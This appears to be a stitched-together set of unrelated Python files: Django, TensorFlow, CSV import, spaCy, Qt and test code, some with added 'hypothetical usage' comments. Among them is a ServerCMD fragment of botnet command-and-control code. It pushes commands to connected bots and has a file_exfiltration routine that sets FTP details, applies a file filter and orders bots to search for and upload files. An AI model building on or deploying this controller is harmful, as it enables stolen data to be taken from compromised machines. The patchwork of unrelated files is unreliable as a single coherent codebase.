        """
        Returns the static files serving handler.
        """
        handler = super(Command, self).get_handler(*args, **options)
        use_static_handler = options.get('use_static_handler', True)
        insecure_serving = options.get('insecure_serving', False)
        if (settings.DEBUG and use_static_handler or
                (use_static_handler and insecure_serving)):
            handler = StaticFilesHandler(handler)
        return handler
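# --- Hypothetical usage note (not part of the original command) ---
# With this management command installed, static file serving during
# development is on by default and can be toggled from the command line:
#
#   python manage.py runserver --nostatic
#   python manage.py runserver --insecure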
# Copyright 2019 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Functions used for Virtual Adversarial Training on sparse feature matrices.""" from .adversarial_dense import get_normalized_vector from .adversarial_dense import get_normalizing_constant import tensorflow as tf epsilon = 5 num_power_iterations = 1 xi = 1e-6 scale_r = False def kl_divergence_with_logit(q_logit, p_logit, mask): """Computes KL-divergence between to sets of logits for the masked samples.""" q = tf.nn.softmax(q_logit) num_non_zero = tf.reduce_sum(mask) qlogq = -tf.nn.softmax_cross_entropy_with_logits_v2(labels=q, logits=q_logit) qlogq = qlogq * mask / num_non_zero qlogp = -tf.nn.softmax_cross_entropy_with_logits_v2(labels=q, logits=p_logit) qlogp = qlogp * mask / num_non_zero return qlogq - qlogp def get_loss_vat(inputs, predictions, mask, is_train, model, placeholders, predictions_var_scope): """Computes the virtual adversarial loss for the provided inputs. Args: inputs: A batch of input features, where the batch is the first dimension. predictions: The logits predicted by a model on the provided inputs. mask: A tensor of booleans specifying which samples to apply the virtual adversarial loss to. is_train: A boolean placeholder specifying if this is a training or testing setting. model: The model that generated the logits. placeholders: Placeholders for model encodings. predictions_var_scope: Variable scope for obtaining the predictions. Returns: A float value representing the virtual adversarial loss. """ mask = tf.cast(mask, dtype=tf.float32) r_vadv = generate_virtual_adversarial_perturbation( inputs, predictions, model, placeholders, mask, predictions_var_scope, is_train=is_train) predictions = tf.stop_gradient(predictions) logit_p = predictions new_inputs = tf.sparse_add(inputs, r_vadv) with tf.variable_scope( predictions_var_scope, auxiliary_name_scope=False, reuse=True): encoding_m, _, _ = model.get_encoding_and_params( inputs=new_inputs, is_train=is_train, update_batch_stats=False, **placeholders) logit_m, _, _ = model.get_predictions_and_params( encoding=encoding_m, is_train=is_train, **placeholders) num_non_zero = tf.reduce_sum(mask) loss = kl_divergence_with_logit(logit_p, logit_m, mask) return tf.reduce_sum(loss) / num_non_zero def generate_virtual_adversarial_perturbation(inputs, logits, model, placeholders, mask, predictions_var_scope, is_train=True): """Generates an adversarial perturbation for virtual adversarial training. Args: inputs: A batch of input features, where the batch is the first dimension. logits: The logits predicted by a model on the provided inputs. model: The model that generated the logits. placeholders: A dictionary mapping string names to Tensorflow placeholders that are passed to the models when generating the predictions. mask: A tensor of booleans specifying which samples to apply the virtual adversarial loss to. predictions_var_scope: Variable scope for obtaining the predictions. is_train: A boolean placeholder specifying if this is a training or testing setting. 
Returns: A Tensor of the same shape as the inputs containing the adversarial perturbation for these inputs. """ # Generate random perturbations. d = tf.random_normal(shape=tf.shape(inputs)) # Only apply perturbations on the masked samples. d = tf.multiply(d, mask[:, None]) for _ in range(num_power_iterations): d = xi * get_normalized_vector(d) logit_p = logits new_inputs = tf.add(tf.sparse_tensor_to_dense(inputs), d) new_inputs = tf.sparse.from_dense(new_inputs) with tf.variable_scope( predictions_var_scope, auxiliary_name_scope=False, reuse=True): encoding_m, _, _ = model.get_encoding_and_params( inputs=new_inputs, is_train=is_train, update_batch_stats=False, **placeholders) logit_m, _, _ = model.get_predictions_and_params( encoding=encoding_m, is_train=is_train, **placeholders) dist = kl_divergence_with_logit(logit_p, logit_m, mask) grad = tf.gradients(dist, [d], aggregation_method=2)[0] d = tf.stop_gradient(grad) r_vadv = get_normalized_vector(d) if scale_r: r_vadv *= get_normalizing_constant(inputs.values) r_vadv *= epsilon return tf.sparse.from_dense(r_vadv) def logsoftmax(x): """Softmax where the inputs are logits and the outputs remain logits.""" xdev = x - tf.reduce_max(x, 1, keep_dims=True) lsm = xdev - tf.log(tf.reduce_sum(tf.exp(xdev), 1, keep_dims=True)) return lsm def entropy_y_x(logits, mask): """Entropy term to add to VAT with entropy minimization. Args: logits: A Tensor containing the predicted logits for a batch of samples. mask: A boolean Tensor specifying which samples to use in the calculation of the entropy. Returns: The entropy minimization loss. """ mask = tf.cast(mask, dtype=tf.float32) p = tf.nn.softmax(logits) ent = tf.reduce_sum(p * logsoftmax(logits), 1) ent = tf.reduce_sum(tf.multiply(ent, mask)) / tf.reduce_sum(mask) return -ent
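# --- Hypothetical usage sketch (not from the original file) ---
# One common way to combine the VAT loss above with a supervised loss.
# The tensors `inputs`, `labels`, `mask`, `is_train`, `predictions`, the
# `model`, `placeholders` and `predictions_var_scope` are assumed to be
# provided by the caller, and vat_weight is an arbitrary example value.
def total_loss_with_vat(inputs, labels, mask, is_train, model, placeholders,
                        predictions_var_scope, predictions, vat_weight=1.0):
    supervised = tf.reduce_mean(
        tf.nn.softmax_cross_entropy_with_logits_v2(labels=labels,
                                                   logits=predictions))
    vat = get_loss_vat(inputs, predictions, mask, is_train, model,
                       placeholders, predictions_var_scope)
    return supervised + vat_weight * vat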
import logging
import contextlib
import sys
import tempfile
import shutil
import glob

from os import getcwd, chdir

from straight.plugin import load

logger = logging.getLogger(__name__)

PLUGIN_NAMESPACE = 'vdt.versionplugin'


class UnknownPlugin(Exception):
    def __init__(self, plugins):
        self.message = "Plugin unknown, try one of %s" % plugins


def load_plugin_by_name(name):
    """
    Load the plugin with the specified name.

    >>> plugin = load_plugin_by_name('default')
    >>> api = dir(plugin)
    >>> 'build_package' in api
    True
    >>> 'get_version' in api
    True
    >>> 'set_package_version' in api
    True
    >>> 'set_version' in api
    True
    """
    plugins = load(PLUGIN_NAMESPACE)
    full_name = "%s.%s" % (PLUGIN_NAMESPACE, name)
    try:
        matches = (plugin for plugin in plugins
                   if plugin.__name__ == full_name)
        return next(matches)
    except StopIteration:
        raise UnknownPlugin(
            [plugin.__name__.split('.').pop() for plugin in plugins])


def query_yes_no(question, default="yes"):
    """Ask a yes/no question via raw_input() and return their answer.

    "question" is a string that is presented to the user.
    "default" is the presumed answer if the user just hits <Enter>.
        It must be "yes" (the default), "no" or None (meaning
        an answer is required of the user).

    The "answer" return value is one of "yes" or "no".
    """
    valid = {"yes": True, "y": True, "ye": True,
             "no": False, "n": False}
    if default is None:
        prompt = " [y/n] "
    elif default == "yes":
        prompt = " [Y/n] "
    elif default == "no":
        prompt = " [y/N] "
    else:
        raise ValueError("invalid default answer: '%s'" % default)

    while True:
        sys.stdout.write(question + prompt)
        choice = raw_input().lower()
        if default is not None and choice == '':
            return valid[default]
        elif choice in valid:
            return valid[choice]
        else:
            sys.stdout.write("Please respond with 'yes' or 'no' "
                             "(or 'y' or 'n').\n")


@contextlib.contextmanager
def change_directory(path=None):
    """
    Context manager that changes directory and resets it when exiting.

    >>> with change_directory('/tmp'):
    >>>     pass
    """
    if path is not None:
        try:
            oldpwd = getcwd()
            logger.debug('changing directory from %s to %s' % (oldpwd, path))
            chdir(path)
            yield
        finally:
            chdir(oldpwd)
    else:
        yield


@contextlib.contextmanager
def empty_directory(path=None):
    """
    Context manager that creates a temporary directory, and cleans it up
    when exiting.

    >>> with empty_directory():
    >>>     pass
    """
    install_dir = tempfile.mkdtemp(dir=path)
    try:
        yield install_dir
    finally:
        shutil.rmtree(install_dir)
#pythran export loopy(int list list, int, int, int) #runas data = [[1, 45, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 60, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0]] ; loopy(data, 0, 100, 100) #skip.bench data = [[1, 45, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0]] + [[0, 60, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0]] * 200 ; loopy(data, 0, 100, 100) TOO_SLOW def _WarningErrorHandler(msg,fatal, _WarningCount): if _WarningCount > 200: raise RuntimeError(msg) else: return _WarningCount +1 def loopy(_PopulationSetInfo_Data, _WarningCount, _NumberOfTriesToGenerateThisIndividual, _NumberOfTriesToGenerateThisSimulationStep): #### Functions Allowed in Expressions #### IndividualID = 0 Repetition = 0 Time = 0 _ResultsInfo_Data = [] #### Create State Handler Functions and State Classification Vector ##### ############### Execute Simulation ############### ####### Subject Loop ####### _Subject = 0 while _Subject < (len(_PopulationSetInfo_Data)): IndividualID = IndividualID +1 # Comment/Uncomment the next line to disable/enable printing of verbose information #print "Simulating Individual #" + str(IndividualID) _NumberOfTriesToGenerateThisIndividual = 1 ##### Repetition Loop ##### Repetition = 0 while Repetition < (1000): # Reset repeat individual repetition flag in case it was set _RepeatSameIndividualRepetition = False #Init all parameters - Resetting them to zero # Comment/Uncomment the next line to disable/enable printing of verbose information #print " Repetition = " + str(Repetition) Gender, Age, State0, State1, State2, State3Terminal, Example_6___Main_Process, Example_6___Main_Process_Entered, State0_Entered, State1_Entered, State2_Entered, State3Terminal_Entered = 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 # Init parameters from population set [Gender, Age, State0, State1, State2, State3Terminal, Example_6___Main_Process, Example_6___Main_Process_Entered, State0_Entered, State1_Entered, State2_Entered, State3Terminal_Entered] = _PopulationSetInfo_Data[IndividualID-1] # Init parameters from Initialization Phase # Reset time and load first vector into results Time = 0 # Load the initial condition into the results vector for this individual _ResultsInfoForThisIndividual = [ [IndividualID, Repetition, Time ,Gender, Age, State0, State1, State2, State3Terminal, Example_6___Main_Process, Example_6___Main_Process_Entered, State0_Entered, State1_Entered, State2_Entered, State3Terminal_Entered] ] _Terminate_Time_Loop = False or State3Terminal != 0 _NumberOfTriesToGenerateThisSimulationStep = 0 _RepeatSameSimulationStep = False ##### Time Loop ##### while Time < 3: if _RepeatSameSimulationStep: # if repeating the same simulation step, reset the flag to avoid infinite loops _RepeatSameSimulationStep = False # Load the previous time step results into the results vector for this individual [_IgnoreIndividualID, _IgnoreRepetition, _IgnoreTime ,Gender, Age, State0, State1, State2, State3Terminal, Example_6___Main_Process, Example_6___Main_Process_Entered, State0_Entered, State1_Entered, State2_Entered, State3Terminal_Entered] = _ResultsInfoForThisIndividual[-1] _Terminate_Time_Loop = False elif _Terminate_Time_Loop: # If the time loop has to be terminated break else: # If not repeating the same simulation step, nor terminating, increase the time counter Time = Time + 1 # Comment/Uncomment the next line to disable/enable printing of verbose information #print " Time Step = " + str(Time) # Reset Warning/Error Count _WarningCountBeforeThisSimulationStep = _WarningCount # Increase the number of Tries counter _NumberOfTriesToGenerateThisSimulationStep = 
_NumberOfTriesToGenerateThisSimulationStep + 1 ##### Phase 1 - Pre State Transition ##### # Processing the rule: "Affected Parameter: Age; Simulation Phase: Pre-stateOccurrence Probability: 1; Applied Formula: Age +1; Rule Notes: Age Increase; ; _LastExpressionString = "Processing the expression: _Threshold = 1 ." # This expression should expand to: _Threshold = 1 try: # Building Step #0: _Threshold = 1 _Temp = 1 if not (-1e-14 <= _Temp <= 1.00000000000001): _WarningCount = _WarningErrorHandler("The occurrence probability threshold defined by a rule does not evaluate to a number between 0 and 1 within a tolerance specified by the system option parameter SystemPrecisionForProbabilityBoundCheck. The occurrence probability was evaluated to: " + str(_Temp) + " for the rule: " + 'Affected Parameter: Age; Simulation Phase: Pre-stateOccurrence Probability: 1; Applied Formula: Age +1; Rule Notes: Age Increase; ; ', True, _WarningCount) except: _WarningCount = _WarningErrorHandler(_LastExpressionString, True, _WarningCount) # Expression building complete - assign to destination parameter _Threshold = _Temp if 0.5 < _Threshold: _LastExpressionString = "Processing the expression: Age = Age +1 ." # This expression should expand to: Age = Age +1 try: # Building Step #0: Age = Age _Temp0 = Age # Building Step #1: Age = Age +1 _Temp = _Temp0 +1 except: _WarningCount = _WarningErrorHandler(_LastExpressionString, True, _WarningCount) # Expression building complete - assign to destination parameter Age = _Temp pass ##### End of Rule Processing ##### ##### Error Handlers ##### if _WarningCount <= _WarningCountBeforeThisSimulationStep: # Load New results to the results vector _ResultsInfoForThisIndividual.append([IndividualID, Repetition, Time ,Gender, Age, State0, State1, State2, State3Terminal, Example_6___Main_Process, Example_6___Main_Process_Entered, State0_Entered, State1_Entered, State2_Entered, State3Terminal_Entered]) _NumberOfTriesToGenerateThisSimulationStep = 0 else: #print " Repeating the same simulation step due to an error - probably a bad validity check" _RepeatSameSimulationStep = True if _NumberOfTriesToGenerateThisSimulationStep >= 5: if _NumberOfTriesToGenerateThisIndividual < 2: # Repeat the calculations for this person _RepeatSameIndividualRepetition = True break else: _WarningCount = _WarningErrorHandler("The simulation was halted since the number of tries to recalculate the same person has been exceeded. If this problem consistently repeats itself, check the formulas to see if these cause too many out of bounds numbers to be generated. Alternatively, try raising the system option NumberOfTriesToRecalculateSimulationOfIndividualFromStart which is now defined as 2 . ", True, _WarningCount) if _RepeatSameIndividualRepetition: #print " Repeating the same repetition for the same individual due to exceeding the allowed number of simulation steps recalculations for this individual" _NumberOfTriesToGenerateThisIndividual = _NumberOfTriesToGenerateThisIndividual + 1 else: # If going to the next individual repetition, save the results and increase the counter # Load New results to the results vector _ResultsInfo_Data.extend(_ResultsInfoForThisIndividual) Repetition = Repetition + 1 _Subject = _Subject + 1 # Comment/Uncomment the next lines to disable/enable dumping output file return _ResultsInfo_Data
#!/usr/bin/env python # ServerCommand import core import copy from config import server_desc class ServerCMD(core.ServerCMD): def __init__(self, desc=server_desc): core.ServerCMD.__init__(self, desc) def forward_to_bots(self, sock, data): self.logger.info('start to echo_bots' ) new_data = copy.deepcopy(data) new_data['event'] = data['bot_event'] del new_data['bot_event'] for client_sock in self.node.client_socks: self.node.send(client_sock, self._dump_json(new_data)) def send_cmd_to_bots(self, cmd, bots=None, broke_socks=[]): self.logger.debug('send command to bots') sock_num = len(self.node.client_socks) if not bots: bots = range(sock_num) print 'sock_num', sock_num print 'broke_socks', broke_socks client_socks = self.node.client_socks # import pdb;pdb.set_trace() new_broke_socks = [] self.logger.debug('cmd [%s] will be send to bots: [%s]'%(str(cmd), str(bots))) for bot_id in bots: if bot_id in broke_socks: continue client_sock = client_socks[bot_id] try: print 'result, ', self._dump_json(cmd) self.node.send(client_sock, self._dump_json(cmd)) # self.node.send(client_sock, 'connect_ack') # print 'self.node.send finished' except IOError: self.logger.info('sock has been closed, cannot send command, \ you have lost control over this bot') new_broke_socks.append(bot_id) return new_broke_socks + broke_socks def file_exfiltration(self, sock, data): """ command: """ self.logger.info('start to issue file exfiltration command') bots = data.get('bots', None) # for client_sock in self.node.client_socks: cmd = copy.deepcopy(self.desc['ftp']) cmd['event'] = 'set_ftp_info' broke_socks = self.send_cmd_to_bots(cmd) cmd = copy.deepcopy(self.desc['file_filter']) cmd['event'] = 'set_file_filter' broke_socks = self.send_cmd_to_bots(cmd, broke_socks) cmd = dict(event='search_and_upload') broke_socks = self.send_cmd_to_bots(cmd, broke_socks) self.node.close_socks(broke_socks, 'client') self.logger.debug('broke_socks %s'%(str(broke_socks)))
import uuid import os import csv from sqlalchemy.exc import IntegrityError from flask import request, current_app from flask_restful import Resource from flask_jwt_extended import jwt_required from zou.app import app from zou.app.utils import permissions from zou.app.services import user_service, projects_service class ImportRowException(Exception): message = "" line_number = 0 def __init__(self, message, line_number): Exception.__init__(self, message) self.message = message self.line_number = line_number class BaseCsvImportResource(Resource): def __init__(self): Resource.__init__(self) @jwt_required def post(self): uploaded_file = request.files["file"] file_name = "%s.csv" % uuid.uuid4() file_path = os.path.join(app.config["TMP_DIR"], file_name) uploaded_file.save(file_path) self.is_update = request.args.get("update", "false") == "true" try: result = self.run_import(file_path) return result, 201 except ImportRowException as e: current_app.logger.error("Import failed: %s" % e) return self.format_error(e), 400 def format_error(self, exception): return { "error": True, "message": exception.message, "line_number": exception.line_number, } def run_import(self, file_path): result = [] self.check_permissions() self.prepare_import() delimiter = self.get_delimiter(file_path) with open(file_path) as csvfile: reader = csv.DictReader(csvfile, delimiter=delimiter) for row in reader: row = self.import_row(row) result.append(row) return result def get_delimiter(self, file_path): delimiter = "," with open(file_path) as csvfile: try: content = csvfile.read() sniffer = csv.Sniffer() dialect = sniffer.sniff(content) delimiter = dialect.delimiter except: pass return delimiter def prepare_import(self): pass def check_permissions(self): return permissions.check_manager_permissions() def import_row(self): pass def add_to_cache_if_absent(self, cache, retrieve_function, name): if name not in cache: cache[name] = retrieve_function(name) return cache[name] def get_id_from_cache(self, cache, name): cached_object = cache[name] if type(cached_object) is dict: return cached_object["id"] else: return cached_object.id class BaseCsvProjectImportResource(BaseCsvImportResource): @jwt_required def post(self, project_id): uploaded_file = request.files["file"] file_name = "%s.csv" % uuid.uuid4() file_path = os.path.join(app.config["TMP_DIR"], file_name) uploaded_file.save(file_path) self.is_update = request.args.get("update", "false") == "true" try: result = self.run_import(project_id, file_path) return result, 201 except ImportRowException as e: return self.format_error(e), 400 def run_import(self, project_id, file_path): result = [] self.check_project_permissions(project_id) self.prepare_import(project_id) delimiter = self.get_delimiter(file_path) with open(file_path) as csvfile: reader = csv.DictReader(csvfile, delimiter=delimiter) line_number = 1 for row in reader: try: row = self.import_row(row, project_id) result.append(row) except IntegrityError as e: raise ImportRowException(e._message(), line_number) except KeyError as e: raise ImportRowException( "A columns is missing: %s" % e.args, line_number ) line_number += 1 return result def check_project_permissions(self, project_id): return user_service.check_manager_project_access(project_id) def import_row(self, project_id): pass def get_descriptor_field_map(self, project_id, entity_type): descriptor_map = {} descriptors = projects_service.get_metadata_descriptors(project_id) for descriptor in descriptors: if descriptor["entity_type"] == entity_type: 
descriptor_map[descriptor["name"]] = descriptor["field_name"] return descriptor_map
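# --- Hypothetical subclass sketch (not part of the original module) ---
# A concrete importer is expected to subclass one of the base resources
# above and implement prepare_import() and import_row(); the entity type,
# column name and returned dict below are illustrative only.
class ExampleAssetsCsvImportResource(BaseCsvProjectImportResource):

    def prepare_import(self, project_id):
        # Cache the custom metadata columns defined for this project.
        self.descriptor_map = self.get_descriptor_field_map(
            project_id, "Asset")

    def import_row(self, row, project_id):
        # "Name" is an assumed CSV column; real importers map their own
        # columns and usually persist the row via a service call.
        name = row["Name"]
        return {"project_id": project_id, "name": name}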
from __future__ import unicode_literals
from __future__ import print_function
import sys

import plac
import bz2
import ujson
import spacy.en


def main(input_loc):
    nlp = spacy.en.English()  # Loading the model takes 10-20 seconds.
    for line in bz2.BZ2File(input_loc):  # Iterate over the Reddit comments from the dump.
        comment_str = ujson.loads(line)['body']  # Parse the json object, and extract the 'body' attribute.
        comment_parse = nlp(comment_str)
        for word in comment_parse:
            if google_doing_something(word):
                # Print the clause
                print(''.join(w.string for w in word.head.subtree).strip())


def google_doing_something(w):
    if w.lower_ != 'google':
        return False
    # Is it the subject of a verb?
    elif w.dep_ != 'nsubj':
        return False
    # And not 'is'
    elif w.head.lemma_ == 'be' and w.head.dep_ != 'aux':
        return False
    # Exclude e.g. "Google says..."
    elif w.head.lemma_ in ('say', 'show'):
        return False
    else:
        return True


if __name__ == '__main__':
    plac.call(main)
import floppyforms.__future__ as forms from django.contrib.contenttypes.generic import GenericForeignKey from django.utils.encoding import force_text from django.utils.translation import ugettext_lazy as _ from ..base import BaseRelationListField from .widgets import GenericRelationListWidget __all__ = ('GenericRelationListField',) def get_default_form(model, ct_field, fk_field, order_field, related_models): form_fields = (ct_field, fk_field) if order_field: form_fields = (order_field,) + form_fields class GenericRelationListForm(forms.ModelForm): class Meta: fields = form_fields def clean(self): cleaned_data = super(GenericRelationListForm, self).clean() content_type = cleaned_data.get(ct_field) if content_type: if content_type.model_class() not in related_models: self.add_error(field=ct_field, error=_( 'The selected type {type} is not allowed here. ' 'Choose one of the following: {allowed}'.format( type=content_type, allowed=', '.join( force_text(model._meta.verbose_name) for model in related_models)) )) return cleaned_data return GenericRelationListForm class GenericRelationListField(BaseRelationListField): widget = GenericRelationListWidget def __init__(self, *args, **kwargs): assert 'related_models' in kwargs, ( 'related_models argument is required') self.generic_fk_name = kwargs.pop('generic_fk_name', None) model = kwargs['model'] generic_fk = self.get_generic_foreign_key(model) kwargs.setdefault('form', get_default_form( model=model, order_field=kwargs.get('order_field', None), fk_field=generic_fk.fk_field, ct_field=generic_fk.ct_field, related_models=kwargs['related_models'])) super(GenericRelationListField, self).__init__(*args, **kwargs) self.determine_generic_relation_fields(model) def get_generic_foreign_key(self, model): if self.generic_fk_name is not None: return model._meta.get_field(self.generic_fk_name) generic_fks = [ field for field in model._meta.get_fields() if isinstance(field, GenericForeignKey)] assert len(generic_fks) == 1, ( 'Given model {model} requires exactly one GenericForeignKey.') return generic_fks[0] def determine_generic_relation_fields(self, model): generic_fk = self.get_generic_foreign_key(model) self.widget.set_object_id_field_name(generic_fk.fk_field) self.widget.set_content_type_field_name(generic_fk.ct_field)
from pulp.client.commands.options import OPTION_REPO_ID from pulp.client.commands.schedule import ( DeleteScheduleCommand, ListScheduleCommand, CreateScheduleCommand, UpdateScheduleCommand, NextRunCommand) from pulp_win.extensions.admin import sync_schedules from ...testbase import PulpClientTests class StructureTests(PulpClientTests): def test_pkg_list_schedule_command(self): command = sync_schedules.PkgListScheduleCommand(self.context) self.assertTrue(isinstance(command, ListScheduleCommand)) self.assertTrue(OPTION_REPO_ID in command.options) self.assertEqual(command.name, 'list') self.assertEqual(command.description, sync_schedules.DESC_LIST) def test_pkg_create_schedule_command(self): command = sync_schedules.PkgCreateScheduleCommand(self.context) self.assertTrue(isinstance(command, CreateScheduleCommand)) self.assertTrue(OPTION_REPO_ID in command.options) self.assertEqual(command.name, 'create') self.assertEqual(command.description, sync_schedules.DESC_CREATE) def test_pkg_delete_schedule_command(self): command = sync_schedules.PkgDeleteScheduleCommand(self.context) self.assertTrue(isinstance(command, DeleteScheduleCommand)) self.assertTrue(OPTION_REPO_ID in command.options) self.assertEqual(command.name, 'delete') self.assertEqual(command.description, sync_schedules.DESC_DELETE) def test_pkg_update_schedule_command(self): command = sync_schedules.PkgUpdateScheduleCommand(self.context) self.assertTrue(isinstance(command, UpdateScheduleCommand)) self.assertTrue(OPTION_REPO_ID in command.options) self.assertEqual(command.name, 'update') self.assertEqual(command.description, sync_schedules.DESC_UPDATE) def test_pkg_next_run_command(self): command = sync_schedules.PkgNextRunCommand(self.context) self.assertTrue(isinstance(command, NextRunCommand)) self.assertTrue(OPTION_REPO_ID in command.options) self.assertEqual(command.name, 'next') self.assertEqual(command.description, sync_schedules.DESC_NEXT_RUN)
""" Test the course_info xblock """ import mock from django.test.utils import override_settings from django.core.urlresolvers import reverse from .helpers import LoginEnrollmentTestCase from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase from courseware.tests.modulestore_config import TEST_DATA_MIXED_MODULESTORE from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory @override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE) class CourseInfoTestCase(LoginEnrollmentTestCase, ModuleStoreTestCase): def setUp(self): self.course = CourseFactory.create() self.page = ItemFactory.create( category="course_info", parent_location=self.course.location, data="OOGIE BLOOGIE", display_name="updates" ) def test_logged_in_unenrolled(self): self.setup_user() url = reverse('info', args=[self.course.id.to_deprecated_string()]) resp = self.client.get(url) self.assertEqual(resp.status_code, 200) self.assertIn("OOGIE BLOOGIE", resp.content) self.assertIn("You are not currently enrolled in this course", resp.content) def test_logged_in_enrolled(self): self.enroll(self.course) url = reverse('info', args=[self.course.id.to_deprecated_string()]) resp = self.client.get(url) self.assertNotIn("You are not currently enrolled in this course", resp.content) def test_anonymous_user(self): url = reverse('info', args=[self.course.id.to_deprecated_string()]) resp = self.client.get(url) self.assertEqual(resp.status_code, 200) self.assertNotIn("OOGIE BLOOGIE", resp.content) @override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE) class CourseInfoTestCaseXML(LoginEnrollmentTestCase, ModuleStoreTestCase): # The following XML test course (which lives at common/test/data/2014) # is closed; we're testing that a course info page still appears when # the course is already closed xml_course_id = 'edX/detached_pages/2014' # this text appears in that course's course info page # common/test/data/2014/info/updates.html xml_data = "course info 463139" @mock.patch.dict('django.conf.settings.FEATURES', {'DISABLE_START_DATES': False}) def test_logged_in_xml(self): self.setup_user() url = reverse('info', args=[self.xml_course_id]) resp = self.client.get(url) self.assertEqual(resp.status_code, 200) self.assertIn(self.xml_data, resp.content) @mock.patch.dict('django.conf.settings.FEATURES', {'DISABLE_START_DATES': False}) def test_anonymous_user_xml(self): url = reverse('info', args=[self.xml_course_id]) resp = self.client.get(url) self.assertEqual(resp.status_code, 200) self.assertNotIn(self.xml_data, resp.content)
# Copyright (C) 2015 Nippon Telegraph and Telephone Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. import re def generate(modname): import sys import functools mod = sys.modules[modname] def add_attr(k, v): setattr(mod, k, v) add_attr('ofp_msg_type_to_str', functools.partial(_msg_type_to_str, mod)) add_attr('ofp_error_type_to_str', functools.partial(_error_type_to_str, mod)) add_attr('ofp_error_code_to_str', functools.partial(_error_code_to_str, mod)) add_attr('ofp_error_to_jsondict', functools.partial(_error_to_jsondict, mod)) def _get_value_name(mod, value, pattern): for k, v in mod.__dict__.items(): if k.startswith(pattern): if v == value: return k return 'Unknown' def _msg_type_to_str(mod, type_): """ This method is registered as ofp_msg_type_to_str(type_) method into ryu.ofproto.ofproto_v1_* modules. And this method returns the message type as a string value for given 'type' defined in ofp_type enum. Example:: >>> ofproto.ofp_msg_type_to_str(14) 'OFPT_FLOW_MOD(14)' """ return '%s(%d)' % (_get_value_name(mod, type_, 'OFPT_'), type_) def _error_type_to_str(mod, type_): """ This method is registered as ofp_error_type_to_str(type_) method into ryu.ofproto.ofproto_v1_* modules. And this method returns the error type as a string value for given 'type' defined in ofp_error_msg structure. Example:: >>> ofproto.ofp_error_type_to_str(4) 'OFPET_BAD_MATCH(4)' """ return '%s(%d)' % (_get_value_name(mod, type_, 'OFPET_'), type_) def _get_error_names(mod, type_, code): t_name = _get_value_name(mod, type_, 'OFPET_') if t_name == 'Unknown': return 'Unknown', 'Unknown' # Construct error code name pattern # e.g.) "OFPET_BAD_MATCH" -> "OFPBMC_" if t_name == 'OFPET_FLOW_MONITOR_FAILED': c_name_p = 'OFPMOFC_' else: c_name_p = 'OFP' for m in re.findall("_(.)", t_name): c_name_p += m.upper() c_name_p += 'C_' c_name = _get_value_name(mod, code, c_name_p) return t_name, c_name def _error_code_to_str(mod, type_, code): """ This method is registered as ofp_error_code_to_str(type_, code) method into ryu.ofproto.ofproto_v1_* modules. And this method returns the error code as a string value for given 'type' and 'code' defined in ofp_error_msg structure. Example:: >>> ofproto.ofp_error_code_to_str(4, 9) 'OFPBMC_BAD_PREREQ(9)' """ (_, c_name) = _get_error_names(mod, type_, code) return '%s(%d)' % (c_name, code) def _error_to_jsondict(mod, type_, code): """ This method is registered as ofp_error_to_jsondict(type_, code) method into ryu.ofproto.ofproto_v1_* modules. And this method returns ofp_error_msg as a json format for given 'type' and 'code' defined in ofp_error_msg structure. Example:: >>> ofproto.ofp_error_to_jsondict(4, 9) {'code': 'OFPBMC_BAD_PREREQ(9)', 'type': 'OFPET_BAD_MATCH(4)'} """ (t_name, c_name) = _get_error_names(mod, type_, code) return {'type': '%s(%d)' % (t_name, type_), 'code': '%s(%d)' % (c_name, code)}
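# --- Hypothetical usage sketch (not part of the original module) ---
# The generate() helper above is meant to be called from an ofproto
# definition module so the conversion helpers get attached to it, e.g. at
# the bottom of a ryu.ofproto.ofproto_v1_* module:
#
#     from ryu.ofproto import ofproto_utils
#     ofproto_utils.generate(__name__)
#
# after which ofp_msg_type_to_str(), ofp_error_code_to_str(), etc. are
# available as module-level functions, as shown in the docstrings above.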
# Progress bar example. A QProgressBar's default range is 0 to 99.

import sys
from PyQt5.QtWidgets import (QWidget, QProgressBar,
                             QPushButton, QApplication)
from PyQt5.QtCore import QBasicTimer


class Example(QWidget):

    def __init__(self):
        super().__init__()
        self.initUI()

    def initUI(self):
        self.pbar = QProgressBar(self)
        self.pbar.setGeometry(30, 40, 200, 25)

        self.btn = QPushButton('Start', self)
        self.btn.move(40, 80)
        self.btn.clicked.connect(self.doAction)

        # Set up a timer that drives the progress bar.
        self.timer = QBasicTimer()
        self.step = 0

        self.setGeometry(300, 300, 280, 170)
        self.setWindowTitle('QProgressBar')
        self.show()

    # Every QObject and its subclasses have a timerEvent() handler for
    # timer events. To react to the timer we reimplement this handler.
    def timerEvent(self, e):
        if self.step >= 100:
            self.timer.stop()
            self.btn.setText('Finished')
            return

        self.step = self.step + 1
        self.pbar.setValue(self.step)

    # Start and stop the timer.
    def doAction(self):
        if self.timer.isActive():
            self.timer.stop()
            self.btn.setText('Start')
        else:
            # start() takes the timeout in milliseconds and the object
            # that will receive the timer events.
            self.timer.start(100, self)
            self.btn.setText('Stop')


if __name__ == '__main__':
    app = QApplication(sys.argv)
    ex = Example()
    sys.exit(app.exec_())